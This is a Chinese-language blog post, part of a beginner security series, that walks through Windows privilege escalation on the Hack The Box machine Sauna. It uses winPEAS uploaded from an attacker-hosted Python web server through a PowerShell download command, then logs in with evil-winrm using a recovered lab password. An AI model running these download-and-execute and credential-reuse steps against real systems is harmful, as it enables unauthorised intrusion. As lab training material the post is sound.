iT邦幫忙

2023 iThome 鐵人賽

DAY 17
0
Security

入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用系列 第 17

[Day 17]Windows提權-winpeas (Windows privilege escalation- winpeas)

  • 分享至 

  • xImage
  •  

前言

當滲透測試者或是駭客獲得初步的存取權時,當前使用者可能非root,如果要進一步提權時,可以使用winpeas輔助使用,尋找可能存在的弱點。使用的前提就是目標主機的作業系統為windows,且已經獲得初步的存取權,能夠上傳winpeas.exe至被害主機。

正文

winpeas使用我將以靶機Sauna說明,目前已經取得使用者fsmith的密碼,並利用evil-winrm登入進受害主機。接著我們先用python在本地開啟網頁伺服器,讓我們能夠在目標主機下載winpeas.exe。

## python3版本
python3 -m http.server 8080

## python2版本
python -m SimpleHTTPServer

下一步就是在目標主機裡輸入指令,下載我們的winpeas.exe。

powershell Invoke-WebRequest -Uri http://[attacke ip]:8080/WinPEASx64.exe -OutFile winpeas.exe
.\winpeas.exe

在此我們利用powershell下載發起一個網頁請求,-Uri指定下載檔案的位置,-OutFile為設定在目標主機儲存的檔名。

Winpeas.exe會揭露主機的基本資訊,從結果我們可以知道主機名稱為SAUNA,使用者為FSmith。

winpeas也會檢查是否有可登入的帳號密碼,在這找到了使用者svc_loanmanager的密碼,但利用evil-winrm登入後發現錯誤。於是,我們在目標主機裡輸入net user確認使用者有哪些。

使者明稱為svc_loanmgr,而非svc_loanmanager,讓我們再次登入。

evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

最後登入成功

接著就能做後續的動作。

今天的介紹到此結束,謝謝:)

/images/emoticon/emoticon41.gif

補充


上一篇
[Day 16]網頁插件分析工具-Wappalyzer (Web plug-ins analyzer-Wappalyzer)
下一篇
[Day 18] Linux提權-linpeas (Linux privilege escalation-linpeas)
系列文
入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用25
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言